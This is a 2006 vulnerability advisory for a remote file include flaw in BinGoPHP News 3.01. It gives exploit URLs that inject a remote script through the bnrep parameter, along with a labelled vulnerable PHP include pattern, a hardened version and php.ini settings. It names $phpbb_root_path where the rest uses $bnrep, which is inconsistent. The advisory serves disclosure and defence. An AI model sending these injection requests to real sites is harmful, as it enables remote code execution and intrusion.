BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability Sep 07 2006 08:59AM
ciriboflacs yahoo com
---------------------------------------------------------------------------

BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

---------------------------------------------------------------------------

Discovered by Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BinGoPHP News

Version : 3.01

URL : http://www.comscripts.com/jump.php?action=script&id=1382

------------------------------------------------------------------

Exploit:

~~~~~~

Variable $phpbb_root_path is not sanitized. When register_globals=on, an attacker can exploit this vulnerability with a simple PHP injection script.

# http://www.site.com/[path]/bp_ncom.php?bnrep=[Evil_Script]

# http://www.site.com/[path]/bp_news.php?bnrep=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~

Declare the variable $bnrep: assign it explicitly before it is used, so that a request parameter of the same name cannot supply it when register_globals is on.
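The pattern behind the exploit URLs above and the fix in the Solution section, as an added example that is not BinGoPHP's own code: an include whose base path variable is never assigned, so register_globals can fill it from the query string, next to the same include with $bnrep declared up front. The function names and the file name config.php are hypothetical.

```php
<?php
// Added example, not code from BinGoPHP News. File and function names are
// hypothetical; the include pattern is the one the advisory describes.

// --- Vulnerable pattern ---------------------------------------------------
// $bnrep is never assigned before use. With register_globals=on, PHP creates
// a global from any request parameter of the same name (?bnrep=...), so the
// include path is request-controlled. With allow_url_fopen enabled the
// attacker-supplied URL is fetched and executed as PHP code.
function load_news_config_vulnerable()
{
    global $bnrep;                    // undefined unless injected by the request
    include($bnrep . '/config.php');  // hypothetical file name
}

// --- Hardened pattern: the advisory's fix, "declare variable $bnrep" -------
// Assigning $bnrep in the script itself overwrites whatever register_globals
// put into it at request start, so the include path no longer comes from
// the request. dirname(__FILE__) resolves to the directory of this script.
$bnrep = dirname(__FILE__);

function load_news_config_hardened()
{
    global $bnrep;

    // Defence in depth: refuse anything that is not an existing local
    // directory, which also rejects any "scheme://" value.
    if (!is_dir($bnrep) || preg_match('#^[a-z][a-z0-9+.-]*://#i', $bnrep)) {
        die('invalid include path');
    }

    include($bnrep . '/config.php');
}
```

The explicit assignment is the actual fix; the is_dir check only catches a later regression. Independently of the application code, the precondition the advisory names can be removed in php.ini with register_globals = Off, and fetching includes over the network can be disabled with allow_url_fopen = Off (or allow_url_include = Off on PHP releases that support that directive).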

---------------------------------------------------------------------------

Shoutz:

~~~~

# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

---------------------------------------------------------------------------

Contact:

~~~~~~

Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RST-CREW.NET

-------------------------------- [ EOF] ----------------------------------

Copyright 2010, SecurityFocus